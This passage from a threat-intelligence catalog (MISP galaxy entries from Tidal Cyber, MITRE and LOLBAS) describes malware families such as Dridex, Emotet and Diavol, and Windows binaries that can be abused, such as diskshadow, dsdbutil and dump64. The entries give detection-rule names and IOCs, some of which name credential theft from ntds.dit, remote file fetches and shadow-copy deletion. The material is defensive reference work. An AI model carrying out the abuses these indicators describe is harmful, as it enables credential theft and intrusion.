Paths: * C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe * C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
Resources: * https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf * https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe
Detection: * Sigma: proc_creation_win_rundll32_susp_activity.yml[Dfsvc.exe - LOLBAS Project]
Internal MISP references
UUID f85966ec-0c4d-4f7e-949f-bb73828bf601
which can be used as unique global reference for Dfsvc
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5102 |
source | Tidal Cyber |
tags | ['18d6d91d-7df0-44c8-88fe-986d9ba00b8d', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Diantz
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary that packages existing files into a cabinet (.cab) file
Author: Tamir Yehuda
Paths: * c:\windows\system32\diantz.exe * c:\windows\syswow64\diantz.exe
Resources: * https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diantz
Detection: * Sigma: proc_creation_win_lolbin_diantz_ads.yml * Sigma: proc_creation_win_lolbin_diantz_remote_cab.yml * IOC: diantz storing data into alternate data streams. * IOC: diantz getting a file from a remote machine or the internet.[diantz.exe_lolbas]
Internal MISP references
UUID 054ddf05-e9f0-4d14-8493-2a1b2ddbefad
which can be used as unique global reference for Diantz
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5103 |
source | Tidal Cyber |
tags | ['96f9b39f-0c59-48a0-9702-01920c1293a7', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Diavol
Diavol is a ransomware variant first observed in June 2021 that is capable of prioritizing file types to encrypt based on a pre-configured list of extensions defined by the attacker. The Diavol Ransomware-as-a-Service (RaaS) program is managed by Wizard Spider, and it has been observed being deployed by Bazar.[Fortinet Diavol July 2021][FBI Flash Diavol January 2022][DFIR Diavol Ransomware December 2021][Microsoft Ransomware as a Service]
Internal MISP references
UUID d057b6e7-1de4-4f2f-b374-7e879caecd67
which can be used as unique global reference for Diavol
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0659 |
source | MITRE |
tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Dipsind
Dipsind is a malware family of backdoors that appear to be used exclusively by PLATINUM. [Microsoft PLATINUM April 2016]
Internal MISP references
UUID 226ee563-4d49-48c2-aa91-82999f43ce30
which can be used as unique global reference for Dipsind
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0200 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Disco
Disco is a custom implant that has been used by MoustachedBouncer since at least 2020 including in campaigns using targeted malicious content injection for initial access and command and control.[MoustachedBouncer ESET August 2023]
Internal MISP references
UUID 194314e3-4edc-5346-96b6-d2d7bf5d830a
which can be used as unique global reference for Disco
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1088 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Diskshadow
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Diskshadow.exe is a tool that exposes the functionality offered by the Volume Shadow Copy Service (VSS).
Author: Oddvar Moe
Paths:
* C:\Windows\System32\diskshadow.exe
* C:\Windows\SysWOW64\diskshadow.exe
Detection:
* Sigma: proc_creation_win_lolbin_diskshadow.yml
* Sigma: proc_creation_win_susp_shadow_copies_deletion.yml
* Elastic: credential_access_cmdline_dump_tool.toml
* IOC: Child process from diskshadow.exe[Diskshadow.exe - LOLBAS Project]
Internal MISP references
UUID 07c49566-5bea-44dc-b81f-e6c90bda9c39
which can be used as unique global reference for Diskshadow
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5104 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Dnscmd
Dnscmd is a Windows command-line utility used to manage DNS servers.[Dnscmd Microsoft]
Internal MISP references
UUID 3fd09997-86e0-4dce-935e-421863e9bad0
which can be used as unique global reference for Dnscmd
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5016 |
source | Tidal Cyber |
tags | ['a45f9597-09c4-4e70-a7d3-d8235d2451a3', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
DnsSystem
DnsSystem is a .NET based DNS backdoor, which is a customized version of the open source tool DIG.net, that has been used by HEXANE since at least June 2022.[Zscaler Lyceum DnsSystem June 2022]
Internal MISP references
UUID e69a913d-4ddc-4d69-9961-25a31cae5899
which can be used as unique global reference for DnsSystem
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1021 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
dnx
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: .Net Execution environment file included with .Net.
Author: Oddvar Moe
Paths: * N/A
Resources: * https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/
Detection:
* Sigma: proc_creation_win_lolbin_dnx.yml
* Elastic: defense_evasion_unusual_process_network_connection.toml
* Elastic: defense_evasion_network_connection_from_windows_binary.toml
* BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules[dnx.exe - LOLBAS Project]
Internal MISP references
UUID e2bdda2e-54b4-4d35-b7e5-4e20626a4481
which can be used as unique global reference for dnx
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5215 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
DOGCALL
DOGCALL is a backdoor used by APT37 that has been used to target South Korean government and military organizations in 2017. It is typically dropped using a Hangul Word Processor (HWP) exploit. [FireEye APT37 Feb 2018]
Internal MISP references
UUID 81ce23c0-f505-4d75-9928-4fbd627d3bc2
which can be used as unique global reference for DOGCALL
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0213 |
source | MITRE |
tags | ['16b47583-1c54-431f-9f09-759df7b5ddb7'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Dok
Dok is a Trojan application disguised as a .zip file that is able to collect user credentials and install a malicious proxy server to redirect a user's network traffic (i.e., Adversary-in-the-Middle).[objsee mac malware 2017][hexed osx.dok analysis 2019][CheckPoint Dok]
Internal MISP references
UUID dfa14314-3c64-4a10-9889-0423b884f7aa
which can be used as unique global reference for Dok
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS'] |
software_attack_id | S0281 |
source | MITRE |
type | ['malware'] |
Doki
Doki is a backdoor that uses a unique Dogecoin-based Domain Generation Algorithm and was first observed in July 2020. Doki was used in conjunction with the ngrok Mining Botnet in a campaign that targeted Docker servers in cloud platforms. [Intezer Doki July 20]
Internal MISP references
UUID e6160c55-1868-47bd-bec6-7becbf236bbb
which can be used as unique global reference for Doki
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Containers', 'Linux'] |
software_attack_id | S0600 |
source | MITRE |
tags | ['efa33611-88a5-40ba-9bc4-3d85c6c8819b'] |
type | ['malware'] |
Donut
Donut is an open source framework used to generate position-independent shellcode.[Donut Github][Introducing Donut] Donut-generated code has been used by multiple threat actors to inject and load malicious payloads into memory.[NCC Group WastedLocker June 2020]
Internal MISP references
UUID 40d25a38-91f4-4e07-bb97-8866bed8e44f
which can be used as unique global reference for Donut
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0695 |
source | MITRE |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Dotnet
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: dotnet.exe comes with .NET Framework
Author: felamos
Paths:
* C:\Program Files\dotnet\dotnet.exe
Resources:
* https://twitter.com/_felamos/status/1204705548668555264
* https://gist.github.com/bohops/3f645a7238d8022830ecf5511b3ecfbc
* https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/
* https://learn.microsoft.com/en-us/dotnet/fsharp/tools/fsharp-interactive/
Detection:
* Sigma: proc_creation_win_lolbin_dotnet.yml
* BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
* IOC: dotnet.exe spawned an unknown process[Dotnet.exe - LOLBAS Project]
Internal MISP references
UUID 1bcd9c93-0944-4671-ab01-cabc5ffe30bf
which can be used as unique global reference for Dotnet
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5216 |
source | Tidal Cyber |
tags | ['09c24b93-bf06-4cbb-acb0-d7b9657a41dc', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Downdelph
Downdelph is a first-stage downloader written in Delphi that has been used by APT28 in rare instances between 2013 and 2015. [ESET Sednit Part 3]
Internal MISP references
UUID f7b64b81-f9e7-46bf-8f63-6d7520da832c
which can be used as unique global reference for Downdelph
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0134 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
down_new
down_new is a downloader that has been used by BRONZE BUTLER since at least 2019.[Trend Micro Tick November 2019]
Internal MISP references
UUID 20b796cf-6c90-4928-999e-88107078e15e
which can be used as unique global reference for down_new
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0472 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
DownPaper
DownPaper is a backdoor Trojan; its main functionality is to download and run second stage malware. [ClearSky Charming Kitten Dec 2017]
Internal MISP references
UUID fc433c9d-a7fe-4915-8aa0-06b58f288249
which can be used as unique global reference for DownPaper
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0186 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
DRATzarus
DRATzarus is a remote access tool (RAT) that has been used by Lazarus Group to target defense and aerospace organizations globally since at least summer 2020. DRATzarus shares similarities with Bankshot, which was used by Lazarus Group in 2017 to target the Turkish financial sector.[ClearSky Lazarus Aug 2020]
Internal MISP references
UUID c6c79fc5-e4b1-4f6c-a71d-d22d699d5caf
which can be used as unique global reference for DRATzarus
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0694 |
source | MITRE |
type | ['malware'] |
Dridex
Dridex is a prolific banking Trojan that first appeared in 2014. By December 2019, the US Treasury estimated Dridex had infected computers in hundreds of banks and financial institutions in over 40 countries, leading to more than $100 million in theft. Dridex was created from the source code of the Bugat banking Trojan (also known as Cridex).[Dell Dridex Oct 2015][Kaspersky Dridex May 2017][Treasury EvilCorp Dec 2019]
Internal MISP references
UUID e3cd4405-b698-41d9-88e4-fff29e7a19e2
which can be used as unique global reference for Dridex
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0384 |
source | MITRE |
tags | ['e809d252-12cc-494d-94f5-954c49eb87ce'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
DropBook
DropBook is a Python-based backdoor compiled with PyInstaller.[Cybereason Molerats Dec 2020]
Internal MISP references
UUID 9c44d3f9-7a7b-4716-9cfa-640b36548ab0
which can be used as unique global reference for DropBook
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0547 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Drovorub
Drovorub is a Linux malware toolset composed of an agent, client, server, and kernel modules that has been used by APT28.[NSA/FBI Drovorub August 2020]
Internal MISP references
UUID bb7f7c19-ffb5-4bfe-99b1-ead3525c5e7b
which can be used as unique global reference for Drovorub
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux'] |
software_attack_id | S0502 |
source | MITRE |
tags | ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59', '1efd43ee-5752-49f2-99fe-e3441f126b00', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
dsdbutil
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Dsdbutil is a command-line tool that is built into Windows Server. It is available if you have the AD LDS server role installed. It can be used as a command-line utility to export Active Directory.
Author: Ekitji
Paths:
* C:\Windows\System32\dsdbutil.exe
* C:\Windows\SysWOW64\dsdbutil.exe
Resources:
* https://gist.github.com/bohops/88561ca40998e83deb3d1da90289e358
* https://www.netwrix.com/ntds_dit_security_active_directory.html
Detection:
* IOC: Event ID 4688
* IOC: dsdbutil.exe process creation
* IOC: Event ID 4663
* IOC: Regular and Volume Shadow Copy attempts to read or modify ntds.dit
* IOC: Event ID 4656
* IOC: Regular and Volume Shadow Copy attempts to read or modify ntds.dit
* Analysis: None Provided
* Sigma: None Provided
* Elastic: None Provided
* Splunk: None Provided
* BlockRule: None Provided[dsdbutil.exe - LOLBAS Project]
Internal MISP references
UUID 9139c12f-a6d9-4300-8735-9298bc46a0bf
which can be used as unique global reference for dsdbutil
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5217 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
dsquery
dsquery is a command-line utility that can be used to query Active Directory for information from a system within a domain. [TechNet Dsquery] It is typically installed only on Windows Server versions but can be installed on non-server variants through the Microsoft-provided Remote Server Administration Tools bundle.
Internal MISP references
UUID 06402bdc-a4a1-4e4a-bfc4-09f2c159af75
which can be used as unique global reference for dsquery
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0105 |
source | MITRE |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'cb3d30b3-8cfc-4202-8615-58a9b8f7f118', 'cd1b5d44-226e-4405-8985-800492cf2865'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Dtrack
Dtrack is spyware that was discovered in 2019 and has been used against Indian financial institutions, research facilities, and the Kudankulam Nuclear Power Plant. Dtrack shares similarities with the DarkSeoul campaign, which was attributed to Lazarus Group. [Kaspersky Dtrack][Securelist Dtrack][Dragos WASSONITE][CyberBit Dtrack][ZDNet Dtrack]
Internal MISP references
UUID aa21462d-9653-48eb-a82e-5c93c9db5f7a
which can be used as unique global reference for Dtrack
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0567 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Dump64
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Memory dump tool that comes with Microsoft Visual Studio
Author: mr.d0x
Paths: * C:\Program Files (x86)\Microsoft Visual Studio\Installer\Feedback\dump64.exe
Resources: * https://twitter.com/mrd0x/status/1460597833917251595
Detection:
* Sigma: proc_creation_win_lolbin_dump64.yml
* IOC: As a Windows SDK binary, execution on a system may be suspicious[Dump64.exe - LOLBAS Project]
Internal MISP references
UUID 13482336-e22b-48e9-bd49-c6e6fc6612ec
which can be used as unique global reference for Dump64
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5218 |
source | Tidal Cyber |
tags | ['0f09c7f5-ba57-4ef0-a196-e85558804496', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
DumpMinitool
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Dump tool that is part of Visual Studio 2022.
Author: mr.d0x
Paths:
* C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions
Resources:
* https://twitter.com/mrd0x/status/1511415432888131586
Detection:
* Sigma: proc_creation_win_dumpminitool_execution.yml
* Sigma: proc_creation_win_dumpminitool_susp_execution.yml
* Sigma: proc_creation_win_devinit_lolbin_usage.yml[DumpMinitool.exe - LOLBAS Project]
Internal MISP references
UUID 7f3bf76a-4e6a-45f1-a4bf-400d5a914e52
which can be used as unique global reference for DumpMinitool
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5219 |
source | Tidal Cyber |
tags | ['3b6ad94f-83ce-47bf-b82d-b98358d23434', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Duqu
Duqu is a malware platform that uses a modular approach to extend functionality after deployment within a target network. [Symantec W32.Duqu]
Internal MISP references
UUID d4a664e5-9819-4f33-8b2b-e6f8e6a64999
which can be used as unique global reference for Duqu
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0038 |
source | MITRE |
tags | ['3ed3f7a6-b446-4fbc-a433-ff1d63c0e647'] |
type | ['malware'] |
DustySky
DustySky is multi-stage malware written in .NET that has been used by Molerats since May 2015.[DustySky][DustySky2][Kaspersky MoleRATs April 2019]
Internal MISP references
UUID 77506f02-104f-4aac-a4e0-9649bd7efe2e
which can be used as unique global reference for DustySky
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0062 |
source | MITRE |
tags | ['e809d252-12cc-494d-94f5-954c49eb87ce'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Dxcap
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: DirectX diagnostics/debugger included with Visual Studio.
Author: Oddvar Moe
Paths:
* C:\Windows\System32\dxcap.exe
* C:\Windows\SysWOW64\dxcap.exe
Resources: * https://twitter.com/harr0ey/status/992008180904419328
Detection: * Sigma: proc_creation_win_lolbin_susp_dxcap.yml[Dxcap.exe - LOLBAS Project]
Internal MISP references
UUID 9b5039b9-c5f1-4516-88ef-f63966ec2b36
which can be used as unique global reference for Dxcap
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5220 |
source | Tidal Cyber |
tags | ['6d065f28-e32d-4e87-b315-c43ebc45532a', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Dyre
Dyre is a banking Trojan that has been used for financial gain. [Symantec Dyre June 2015][Malwarebytes Dyreza November 2015]
Internal MISP references
UUID 38e012f7-fb3a-4250-a129-92da3a488724
which can be used as unique global reference for Dyre
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0024 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Earthworm
Earthworm is an open-source tool. According to its project website, Earthworm is a "simple network tunnel with SOCKS v5 server and port transfer".[Elastic Docs Potential Protocol Tunneling via EarthWorm] According to joint Cybersecurity Advisory AA23-144a (May 2023), Volt Typhoon actors have used Earthworm in their attacks.[U.S. CISA Volt Typhoon May 24 2023]
Internal MISP references
UUID ee14e483-b5ef-4931-9c2a-72046b6555cc
which can be used as unique global reference for Earthworm
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5013 |
source | Tidal Cyber |
tags | ['ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Ebury
Ebury is an SSH backdoor targeting Linux operating systems. Attackers require root-level access, which allows them to replace SSH binaries (ssh, sshd, ssh-add, etc.) or modify a shared library used by OpenSSH (libkeyutils).[ESET Ebury Feb 2014][BleepingComputer Ebury March 2017][ESET Ebury Oct 2017]
Internal MISP references
UUID 2375465a-e6a9-40ab-b631-a5b04cf5c689
which can be used as unique global reference for Ebury
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux'] |
software_attack_id | S0377 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
ECCENTRICBANDWAGON
ECCENTRICBANDWAGON is a remote access Trojan (RAT) used by North Korean cyber actors that was first identified in August 2020. It is a reconnaissance tool, with keylogging and screen capture functionality, used for information gathering on compromised systems.[CISA EB Aug 2020]
Internal MISP references
UUID 70f703b3-0e24-4ffe-9772-f0e386ec607f
which can be used as unique global reference for ECCENTRICBANDWAGON
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0593 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Ecipekac
Ecipekac is a multi-layer loader that has been used by menuPass since at least 2019 including use as a loader for P8RAT, SodaMaster, and FYAnti.[Securelist APT10 March 2021]
Internal MISP references
UUID 6508d3dc-eb22-468c-9122-dcf541caa69c
which can be used as unique global reference for Ecipekac
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0624 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Egregor
Egregor is a Ransomware-as-a-Service (RaaS) tool that was first observed in September 2020. Researchers have noted code similarities between Egregor and Sekhmet ransomware, as well as Maze ransomware.[NHS Digital Egregor Nov 2020][Cyble Egregor Oct 2020][Security Boulevard Egregor Oct 2020]
Internal MISP references
UUID 0e36b62f-a6e2-4406-b3d9-e05204e14a66
which can be used as unique global reference for Egregor
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0554 |
source | MITRE |
tags | ['562e535e-19f5-4d6c-81ed-ce2aec544f09', '3c3f9078-5d1e-4c29-a5eb-28f237bbd1ad', '0ed7d10c-c65b-4174-9edb-446bf301d250', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
EKANS
EKANS is a ransomware variant written in Golang that first appeared in mid-December 2019 and has been used against multiple sectors, including energy, healthcare, and automotive manufacturing, which in some cases resulted in significant operational disruptions. EKANS has used a hard-coded kill-list of processes, including some associated with common ICS software platforms (e.g., GE Proficy, Honeywell HMIWeb, etc.), similar to those defined in MegaCortex.[Dragos EKANS][Palo Alto Unit 42 EKANS]
Internal MISP references
UUID cd7821cb-32f3-4d81-a5d1-0cdee94a15c4
which can be used as unique global reference for EKANS
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0605 |
source | MITRE |
tags | ['3ed3f7a6-b446-4fbc-a433-ff1d63c0e647', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Elise
Elise is a custom backdoor Trojan that appears to be used exclusively by Lotus Blossom. It is part of a larger group of tools referred to as LStudio, ST Group, and APT0LSTU. [Lotus Blossom Jun 2015][Accenture Dragonfish Jan 2018]
Internal MISP references
UUID fd5efee9-8710-4536-861f-c88d882f4d24
which can be used as unique global reference for Elise
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0081 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
ELMER
ELMER is a non-persistent, proxy-aware HTTP backdoor written in Delphi that has been used by APT16. [FireEye EPS Awakens Part 2]
Internal MISP references
UUID 6a3ca97e-6dd6-44e5-a5f0-7225099ab474
which can be used as unique global reference for ELMER
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0064 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Emissary
Emissary is a Trojan that has been used by Lotus Blossom. It shares code with Elise, with both Trojans being part of a malware group referred to as LStudio. [Lotus Blossom Dec 2015]
Internal MISP references
UUID fd95d38d-83f9-4b31-8292-ba2b04275b36
which can be used as unique global reference for Emissary
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0082 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Emotet
Emotet is a modular malware variant that is primarily used as a downloader for other malware variants such as TrickBot and IcedID. Emotet first emerged in June 2014 and has been primarily used to target the banking sector. [Trend Micro Banking Malware Jan 2019]
Internal MISP references
UUID c987d255-a351-4736-913f-91e2f28d0654
which can be used as unique global reference for Emotet
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0367 |
source | MITRE |
tags | ['71dfe8d1-666f-4e71-8761-d2876078fb3e', '84615fe0-c2a5-4e07-8957-78ebc29b4635', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Empire
Empire is an open source, cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python, the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries.[NCSC Joint Report Public Tools][Github PowerShell Empire][GitHub ATTACK Empire]
Internal MISP references
UUID fea655ac-558f-4dd0-867f-9a5553626207
which can be used as unique global reference for Empire
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Linux', 'Windows'] |
software_attack_id | S0363 |
source | MITRE |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '4f05a12d-f497-4081-acb9-9a257ab87886', '15787198-6c8b-4f79-bf50-258d55072fee', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f', 'e81ba503-60b0-4b64-8f20-ef93e7783796'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
EnvyScout
EnvyScout is a dropper that has been used by APT29 since at least 2021.[MSTIC Nobelium Toolset May 2021]
Internal MISP references
UUID 8da6fbf0-a18d-49a0-9235-101300d49d5e
which can be used as unique global reference for EnvyScout
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0634 |
source | MITRE |
